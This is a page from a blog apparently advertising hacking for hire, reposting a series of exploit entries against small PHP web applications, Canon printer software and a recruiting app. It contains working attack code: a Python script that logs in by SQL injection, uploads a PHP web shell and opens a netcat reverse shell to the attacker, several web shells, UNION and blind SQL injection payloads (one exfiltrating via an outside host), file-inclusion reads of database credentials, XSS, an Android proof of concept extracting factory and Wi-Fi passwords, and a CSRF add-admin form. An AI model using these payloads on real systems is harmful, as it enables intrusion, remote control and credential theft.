Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130508

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload
# Date: 09-11-2020
# Exploit Author: Fortunato Lodari [fox at thebrain dot net]
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Debian 10 with apache2

# This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car
# in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA"
# as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell
# on the victim system
#
# on the Attacker machine you must listen with NC on a port

import sys
import requests
import time
import random
import http.cookiejar
import os.path
from os import path
#foxlox#



payload = {"username":"' OR 1=1 limit 1#","password":"moana"}

proxies = { "http": "http://localhost:8080"}

#payload = "username=' OR 1=1 limit 1 #&password=ciao"

def deb(str):
    print("Debug => "+str)

def login():
    deb("Login...")
    session=requests.Session()
    url = mainurl+"/admin/ajax.php?action=login"
    #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'}
    r=session.post(url,payload, allow_redirects=False,proxies=proxies)
    cookie = r.headers["Set-Cookie"]
    deb(cookie)
    return cookie

def find_all(a_str, sub,lbegin,lend):
    start = 0
    start = a_str.find(sub, start)
    t=(a_str[start+lbegin:start+lend]).replace('"','')
    return t


def upload(c):
    deb("Getting cookie")
    c = c.split("=");cookie={c[0]:c[1]}
    deb("Sending payload")
    filetosend=files = {'img': ('s_hell.php', '<?php\necho system($_GET["cmd"]);\n?>\n')}
    fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""}
    r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend)
    deb("Saved Machine");
    r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False)
    mid=find_all(r.content,'data-id=',8,11)
    deb("Machine id: "+mid)
    r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False)
    defurl=(find_all(r.content,"assets/uploads/cars_img",0,45))
    deb("Exploit url: "+defurl)
    #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id")
    exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null"
    print("Opening url: "+exploit)
    print("Don't forget to run: nc -nvlp "+sys.argv[3])
    os.system(exploit)


def usage():
    if len(sys.argv) < 4:
        print("Create a PHPShell for Car Rental Management System")
        print("example:")
        print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT")
        exit()


    
usage()
mainurl = sys.argv[1]
upload(login())

#fox
HireHackking 
# Exploit Title: Car Rental Management System 1.0 - SQL Injection / Local File include
# Date: 22-10-2020
# Exploit Author: Mosaaed 
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: parrot + Apache/2.4.46 (Debian)

SQL Injection
#Vulnerable Page: http://localhost/carRental/index.php?page=view_car&id=4

#POC 1: 
http://localhost/carRental/index.php?page=view_car&id=-4+union+select+1,2,3,4,5,6,concat(username,0x3a,password),8,9,10+from+users--

LFI
#Vulnerable Page1: http://localhost/carRental/index.php?page=about
#Vulnerable Page2:http://localhost/carRental/admin/index.php?page=movement

#POC 1:

http://localhost/carRental/index.php?page=php://filter/convert.base64-encode/resource=home

#POC 2:http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect

note POC 2 reading database information

#example : 
curl -s -i POST http://localhost/carRental/admin/index.php?page=php://filter/convert.base64-encode/resource=db_connect | grep view-panel -A 1

#result

<main id="view-panel" >
        	PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywncGFzc3dvcmQnLCdjYXJfcmVudGFsX2RiJylvciBkaWUoIkNvdWxkIG5vdCBjb25uZWN0IHRvIG15c3FsIi5teXNxbGlfZXJyb3IoJGNvbikpOw0K

#proof of concept picture

https://ibb.co/8Dd7d9G
HireHackking 
# Exploit Title: Car Rental Management System 1.0 - Remote Code Execution (Authenticated)
# Date: 2020-11.13
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Apache2 - Windows 10

Vulnerable param: img
-------------------------------------------------------------------------
POST /car_rental/admin/ajax.php?action=save_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------30709612614161811513297969444
Content-Length: 777
Origin: http://localhost
Connection: close
Referer: http://localhost/car_rental/admin/index.php?page=site_settings
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean

-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="name"

Car Rental Management System
-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="email"

info@sample.comm
-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="contact"

+6948 8542 623
-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="about"

content

-----------------------------30709612614161811513297969444
Content-Disposition: form-data; name="img"; filename="k.php"
Content-Type: application/octet-stream

<?php echo passthru($_GET['k']);?>
-----------------------------30709612614161811513297969444--


Source Code:

admin\admin_class.php:
--------------------------------------------------------------------
                if($_FILES['img']['tmp_name'] != ''){
                                                                                                                $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
                                                                                                                $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname);
                                                                                                                $data .= ", avatar = '$fname' ";

                                                }

--------------------------------------------------------------------

POC:
http://{site]/admin/assets/uploads/{FILE}.php?k=whoami
HireHackking 
# Exploit Title: Car Rental Management System 1.0 - Arbitrary File Upload
# Date: 22-10-2020
# Exploit Author: Jyotsna Adhana and Saurav Shukla
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4


#Vulnerable Page: http://localhost/carRental/admin/index.php?page=manage_car

#Exploit
	Fill details
	Create php shell code with below script
		<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
	Click on Browse
	Select php file
	Click Save
	Access below URL:
		http://localhost/carRental/admin/assets/uploads/cars_img/1603387740_backdoor.php?cmd=sysinfo
	add system commands after cmd to execute it.
HireHackking 
# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection
# Date: 2020-11.13
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Author ID: 8763
# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Apache2 - Windows 10

Vulnerable param: car_id
-------------------------------------------------------------------------
GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


Source Code:

booking.php:
--------------------------------------------------------------------
<?php
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['car_id']);
foreach($qry->fetch_array() as $k => $val){
                $$k=$val;
}

Vulnerable param: id
-------------------------------------------------------------------------
GET /car_rental/index.php?page=view_car&id=-3+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+users# HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0


Source Code:

view_car.php:
--------------------------------------------------------------------
<?php
if(isset($_GET['id'])){
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM cars where id= ".$_GET['id']);
HireHackking 
# Exploit Title: Car Park Management System 1.0 - Authentication Bypass
# Date: 2020-05-07
# Exploit Author: Tarun Sehgal
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/car-park-management-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

---------------------------------------------------------------------------------

#parameter Vulnerable: phone and password
#Injected Request
#Below request will allow authentication bypass

POST /Car%20Park%20Management%20System/proc/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
Origin: http://localhost
Connection: close
Referer: http://localhost/Car%20Park%20Management%20System/
Cookie: PHPSESSID=d84agc0pp6qihtm7u775ftvukd
Upgrade-Insecure-Requests: 1

phone=' or '1'='1&password=' or '1'='1&Submit=Log+In
HireHackking 
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

<!-- 
# Exploit Title:  Car or Cab Booking Script - SQL injection login bypass 
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: N/A
# Date: 28.08.2017
# software link : http://www.phpscriptsmall.com/product/cab-booking-script/
# Version: 3.04
# Category: Webapps
# Tested on: windows64bit / mozila firefox 
# 
#
--!>

# ========================================================
#
#
# Car or Cab Booking Script - SQL injection login bypass 
# 
# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school
# 
# Proof of Concept : - 
# 
# http://localhost/taxibooking/login.php  [ set username and password ] to >>  admin' or 1=1 -- - 
#  you must choose the check box as current and existing user  
#   
# 
# 
#
# 
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
HireHackking 
## Exploit Title: Canteen-Management v1.0 - XSS-Reflected
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor:  Free PHP Projects & Ideas with Source Codes for Students |
mayurik <https://www.mayurik.com/>
## Software:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/Docs
## Reference:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management

## Description:
The name of an arbitrarily supplied URL parameter is copied into the value
of an HTML tag attribute which is encapsulated in double quotation marks.
The attacker can craft a very malicious HTTPS URL redirecting to a very
malicious URL. When the victim clicks into this crafted URL the game will
over for him.

[+]Payload REQUEST:

```HTML
GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22
https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106",
"Chromium";v="106"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```

[+]Payload RESPONSE:

```burp
HTTP/1.1 200 OK
Date: Tue, 04 Oct 2022 09:44:55 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 6140
Connection: close
Content-Type: text/html; charset=UTF-8

<link rel="stylesheet" href="assets/css/popup_style.css">
           <style>
.footer1 {
  position: fixed;
  bottom: 0;
  width: 100%;
  color: #5c4ac7;
  text-align: center;
}

</style>
   <!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">

<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0,
user-scalable=0, minimal-ui">
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="description" content="">
<meta name="keywords" content="">
<meta name="author" content="">

    <link rel="icon" type="image/png" sizes="16x16"
href="assets/uploadImage/Logo/favicon.png">





             <style type="text/css">
@media print {
    #printbtn {
        display :  none;
    }
}
</style>
    <title>Youthappam Canteen Management System - by Mayuri K.
Freelancer</title>

  <link href="assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
  <link href="assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
    <link href="assets/css/lib/owl.theme.default.min.css" rel="stylesheet"
/>

    <link href="assets/css/lib/bootstrap/bootstrap.min.css"
rel="stylesheet">

    <link href="assets/css/helper.css" rel="stylesheet">
    <link href="assets/css/style.css" rel="stylesheet">
 <link rel="stylesheet"
href="assets/css/lib/html5-editor/bootstrap-wysihtml5.css" />
 <link href="assets/css/lib/calendar2/semantic.ui.min.css" rel="stylesheet">
    <link href="assets/css/lib/calendar2/pignose.calendar.min.css"
rel="stylesheet">
     <link href="assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
     <link href="assets/css/lib/datepicker/bootstrap-datepicker3.min.css"
rel="stylesheet">


    <script type="text/javascript" src="
https://www.gstatic.com/charts/loader.js"></script>
    <script type="text/javascript">
      google.charts.load("current", {packages:["corechart"]});
      google.charts.setOnLoadCallback(drawChart);
      function drawChart() {
        var data = google.visualization.arrayToDataTable([
          ['Food', 'Average sale per Day'],
          ['Masala dosa',     11],
          ['Chicken 65 ',      2],
          ['Karapu Boondi',  2],
          ['Bellam Gavvalu', 2],
          ['Gummadikaya Vadiyalu',    7]
        ]);

        var options = {
          title: 'Food Average Sale per Day',
          pieHole: 0.4,
        };

        var chart = new
google.visualization.PieChart(document.getElementById('donutchart'));
        chart.draw(data, options);
      }
    </script>
</head>

<body class="fix-header fix-sidebar">

<div id="page"></div>
<div id="loading"></div>





    <div id="main-wrapper">
        <div class="unix-login">

            <div class="container-fluid" style="background-image:
url('assets/myimages/background.jpg');
 background-color: #ffffff;background-size:cover">
                <div class="row">
                    <div class="col-lg-4 ml-auto">
                        <div class="login-content">
                            <div class="login-form">
                                <center><img
src="./assets/uploadImage/Logo/logo.png" style="width: 100%;"></center><br>
                                <form
action="/youthappam/login.php/lu555"><a href="https:/pornhub.com/"
target="_blank" rel="noopener nofollow ugc"> <img src="https:/
raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif"
method="post" id="loginForm">
                                    <div class="form-group">

                                        <input type="text" name="username"
id="username" class="form-control" placeholder="Username" required="">

                                    </div>
                                    <div class="form-group">

                                        <input type="password"
id="password" name="password" class="form-control" placeholder="Password"
required="">
                                    </div>


                                    <button type="submit" name="login"
class="f-w-600 btn btn-primary btn-flat m-b-30 m-t-30">Sign in</button>

                                <!-- <div class="forgot-phone text-right
f-right">
<a href="#" class="text-right f-w-600"> Forgot Password?</a>
</div> -->

<div class="forgot-phone text-left f-left">
<a href = "mailto:mayuri.infospace@gmail.com?subject = Project Development
Requirement&body = I saw your projects. I want to develop a project"
class="text-right f-w-600"> Click here to contact me</a>
</div>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>




    <script src="./assets/js/lib/jquery/jquery.min.js"></script>

    <script src="./assets/js/lib/bootstrap/js/popper.min.js"></script>
    <script src="./assets/js/lib/bootstrap/js/bootstrap.min.js"></script>

    <script src="./assets/js/jquery.slimscroll.js"></script>

    <script src="./assets/js/sidebarmenu.js"></script>

    <script
src="./assets/js/lib/sticky-kit-master/dist/sticky-kit.min.js"></script>

    <script src="./assets/js/custom.min.js"></script>
    <script>

function onReady(callback) {
    var intervalID = window.setInterval(checkReady, 1000);
    function checkReady() {
        if (document.getElementsByTagName('body')[0] !== undefined) {
            window.clearInterval(intervalID);
            callback.call(this);
        }
    }
}

function show(id, value) {
    document.getElementById(id).style.display = value ? 'block' : 'none';
}

onReady(function () {
    show('page', true);
    show('loading', false);
});
    </script>
</body>

</html>
```

## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management
)

## Proof and Exploit:
[href](https://streamable.com/emg0zo)

-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
## Exploit Title: Canteen-Management v1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: https://www.mayurik.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi

## Description:
The username parameter from Canteen-Management1.0-2022 appears to be
vulnerable to SQL injection attacks.
The malicious user can attack remotely this system by using this
vulnerability to steal all information from the database of this
system.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND
'awEr'='awEr&password=h5F!l8j!Y6&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)

## Proof and Exploit:
[href](https://streamable.com/vvz2lh)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
HireHackking 
# Title: Canon PrintMe EFI - Cross-Site Scripting	 
# Date: 9.6.2018-06-09	 
# Exploit Author: Huy Kha	
# Vendor Homepage: [https://www.efi.com/]  
# Version: Canon PrintMe EFI	
# Tested on: Mozilla FireFox 
# CVE: CVE-2018-12111
# XSS Payload used: '"--!><img src=x onerror=alert("XSS")>
	
# PoC
	
GET /wt3/mydocs.php/'%22--!%3E%3Cimg%20src=x%20onerror=alert(%22XSS%22)%3E HTTP/1.1
Host: 129.25.8.177
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a11b2588fe327f6bd1acf79f286c2dcd
Connection: close
Upgrade-Insecure-Requests: 1
HireHackking 
# Exploit Title: Content Provider URI Injection on Canon PRINT 2.5.5
(CVE-2019-14339)
# Date: 24th July, 2019
# Exploit Author: 0x48piraj
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home/explore/printing-innovations/mobile-printing/canon-print-app
# Software Link: https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint
<https://play.google.com/store/apps/details?id=jp.co.canon.bsd.ad.pixmaprint&hl=en_IN>#
Exploit : https://github.com/0x48piraj/CVE-2019-14339
# Version: Canon PRINT 2.5.5
# Tested on: Android 8.0.0
# CVE : CVE-2019-14339

The ContentProvider in the Canon PRINT 2.5.5 application for Android
does not properly restrict data access. This allows an attacker's
malicious application to obtain sensitive information including
factory passwords for administrator web-interface and WPA2-PSK key.
The mobile application contains unprotected exported content providers
('IJPrinterCapabilityProvider' in android/AndroidManifest.xml) that
discloses sensitive application’s data under certain conditions. To
securely export the content provider, one should restrict access to it
by setting up android:protectionLevel or android:grantUriPermissions
attributes in Android Manifest file.

-- Proof-of-concept code (Java)

--

package cannon.print.pwn;

import android.database.Cursor;
import android.net.Uri;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import android.widget.Toast;
import org.apache.commons.lang3.StringUtils; //
https://stackoverflow.com/a/50198499

public class MainActivity extends AppCompatActivity {

    Button PwnBtn;

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        PwnBtn = (Button) findViewById(R.id.button);
        PwnBtn.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View view) {
                Toast.makeText(getApplicationContext(), "Payload
triggered ...", Toast.LENGTH_SHORT).show();
                Uri cannonURI =
Uri.parse("content://canon.ij.printer.capability.data/");
                Cursor cursor = getContentResolver().query(cannonURI,
null, null, null, null);
                int count  = cursor.getCount();
                TextView data=(TextView)findViewById(R.id.data);
                data.setText(String.valueOf(count));
                cursor.moveToFirst();
                String tempstr = " ";
                tempstr ="  "+tempstr +"\t"+ cursor.getString(0) + "\t\t\t"
                        + cursor.getString(1) + "\t\t\t" + cursor.getString(2);
                String dpw = StringUtils.substringBetween(tempstr,
"<ivec:product_serialnumber>", "</ivec:product_serialnumber>");
                String dmac = cursor.getString(4);
                String mdeviceid = cursor.getString(13); // raw
                String dtype = StringUtils.substringBetween(mdeviceid,
";CLS:", ";DES");
                String timestamp = cursor.getString(15); // ticks,
device last used
                String dclass = StringUtils.substringBetween(tempstr,
"<ivec:manufacturer>", "</ivec:manufacturer>");
                String dmodel = StringUtils.substringBetween(tempstr,
"<ivec:model>", "</ivec:model>");
                String dserial = StringUtils.substringBetween(tempstr,
"<ivec:serialnumber>", "</ivec:serialnumber>");
                String dfmver = StringUtils.substringBetween(tempstr,
"<ivec:firmver>", "</ivec:firmver>");
                String dservice =
StringUtils.substringBetween(tempstr, "<ivec:service>",
"</ivec:service>");
                /* More juicy data
                String denv = StringUtils.substringBetween(tempstr,
"<vcn:host_environment>", "</vcn:host_environment>");
                String dpapertype =
StringUtils.substringBetween(tempstr, "<ivec:papertype>",
"</ivec:papertype>");
                String dformats =
StringUtils.substringBetween(tempstr, "<ivec:support_data_format>",
"</ivec:support_data_format>");
                */
                String fout = String.format("Device Type : %s\nDevice
Class : %s\nDevice Model : %s\nDevice Serial : %s\nDevice MAC Address
: %s\nDevice Factory Password : %s\nDevice Firmware Version :
%s\nDevice Services : %s\nDevice Last Used : %s\n", dtype, dclass,
dmodel, dserial, dmac, dpw, dfmver, dservice, timestamp);
                data.setText(fout);
            }
        });
    }
}

-- Proof-of-concept python script over ADB --

import subprocess, datetime, sys

def ext(out, var, rw=';'):
    return out.split(var)[1].split(rw)[0]

print("[#] Make sure you've connected the target device w/ adb ...")
print("[*] Running the exploit using adb ...\n\n")
out = subprocess.getoutput("adb shell content query --uri content://canon.ij.printer.capability.data/")

if "<ivec:contents>" not in out:
    print("[!] Error: Couldn't fetch data from adb ...")
    sys.exit(1)

varz = [";CLS:", ";MDL:", ";DES:", ";VER:", ";PSE:"] #
factory_pw_check =
out.split("<ivec:product_serialnumber>")[1].split('</ivec:product_serialnumber>')[0]
prmz = ["Class", "Model", "Description", "Firmware Version", "Factory Password"]
for prm, var in zip(prmz, varz):
	print(" -- Device %s : %s" % (prm, ext(out, var)))
print(" -- Device MAC Address : {}".format(ext(out, 'mmacaddress=', ',')))
print(" -- Device Last Used : %s" % (datetime.timedelta(microseconds =
int(ext(out,', timestamp=', ', '))/10)))
HireHackking 
# Exploit Title: Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE'  - Unquoted Service Path
# Discovery by: Carlos Roa
# Discovery Date: 2020-11-07
# Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home
# Tested Version: 5.1.0.8
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Professional 64 bits (spanish)

# Step to discover Unquoted Service Path: 

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v "C:\Windows\\" | findstr /i /v """

Canon Inkjet Printer/Scanner/Fax Extended Survey Program                IJPLMSVC                             C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE              Auto       


# Service info:

C:\Users>sc qc IJPLMSVC
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ijplmsvc
        TIPO               : 10  WIN32_OWN_PROCESS 
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
        GRUPO_ORDEN_CARGA  : 
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Canon Inkjet Printer/Scanner/Fax Extended Survey Program
        DEPENDENCIAS       : 
        NOMBRE_INICIO_SERVICIO: LocalSystem


#Exploit:

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking 
# Title: CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-02-21
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/auieo/profile/
# Software Link: https://sourceforge.net/projects/candidats/files/#Version 2.1.0
# Tested on Ubuntu 19/Kali Rolling

# The Candid ATS Web application is vulnerable to CSRF to add a new admin user:
#CSRF Proof of Concept:

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://HOSTNAME/Candid/index.php?m=settings&a=addUser" method="POST">
          <input type="hidden" name="postback" value="postback" />
          <input type="hidden" name="role" value="none" />
          <input type="hidden" name="firstName" value="Test" />
